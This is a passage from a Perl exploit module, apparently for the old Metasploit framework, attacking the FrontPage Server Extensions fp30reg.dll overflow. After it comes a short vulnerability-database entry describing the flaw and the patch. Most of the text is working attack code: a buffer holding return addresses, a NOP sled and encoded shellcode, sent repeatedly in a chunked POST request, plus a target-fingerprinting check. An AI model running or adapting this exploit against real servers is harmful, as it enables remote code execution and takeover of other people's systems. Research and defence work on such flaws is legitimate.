    my $shellcode   =$self->GetVar('EncodedPayload')->Payload;
  
    my @targets;
    my @offsets;
    my $pad;

    my $ret = defined($target_idx) ? ($self->Targets->[ $target_idx ]->[1]) : $self->Targets->[0]->[1];
    my $pattern = Pex::PatternCreate(0xDEAD);
    
    my $count = 0;
    while (1)
    {
        if ($count % 3 == 0)
        {
            $self->PrintLine("[*] Refreshing remote process...");
            my $res = $self->Check();
            $count = 0;
        }

        substr($pattern, 128, 4, pack("V", $ret));
        substr($pattern, 264, 4, pack("V", $ret));
        substr($pattern, 160, 7, "\x2d\xff\xfe\xff\xff" . "\xff\xe0");
        substr($pattern, 280, 512, "\x90" x 512);
        substr($pattern, 792, length($shellcode), $shellcode);

        my $request;
        $request  = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
        $request .= "Host: $target_host:$target_port\r\n";
        $request .= "Transfer-Encoding: chunked\r\n";
        $request .= "\r\n";
        $request .= "DEAD\r\n";
        $request .= $pattern . "\r\n";
        $request .= "0\r\n";

        my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
        if (! $s->Tcp($target_host, $target_port))
        {
            $self->FatalError("Could not connect: " . $s->GetError());
            return;
        }

        $self->PrintLine("[*] Sending exploit request...");
        $s->Send($request);
        sleep(1);
        $s->Close();
        $count++;
    }
    return;
}

sub Check {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    
    my $getreq = "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n".
                 "Host: $target_host:$target_port\r\n\r\n";
 
    my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
    
    if (! $s)
    {
       $self->PrintLine("[*] Could not create the socket");
       return(0);
    }
    
    if (! $s->Tcp($target_host, $target_port))
    {
        $self->PrintLine("[*] Could not connect: " . $s->GetError());
        return(0);
    }
    
    $s->Send($getreq);
    my $res = $s->Recv(-1, 10);
    $s->Close();
    
    if ($res !~ /501 Not Implemented/)
    {
        $self->PrintLine("[*] Frontpage component was not found");
        return(0);
    }

    $self->PrintLine("[*] Frontpage component found");
    return(1);

}


- Vulnerability Information

577
FrontPage Server Extensions Visual Studio RAD Support Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Microsoft Front Page Server Extensions (FPSE), included in IIS Web Server, contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a sub-component in FPSE called Visual Studio Remote Application Deployment (RAD) which allows Visual InterDev users to register and un-register programming components on the IIS server. The sub-component contains an unchecked buffer that may allow an attacker to execute arbitrary code with IUSR_Machine privileges.

- Timeline

2001-06-25 2001-04-13
2001-06-25 Unknown

- Solution

Microsoft has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workarounds: Delete or prevent access to fp30reg.dll and fp4areg.dll

- Related References

- Vulnerability Author
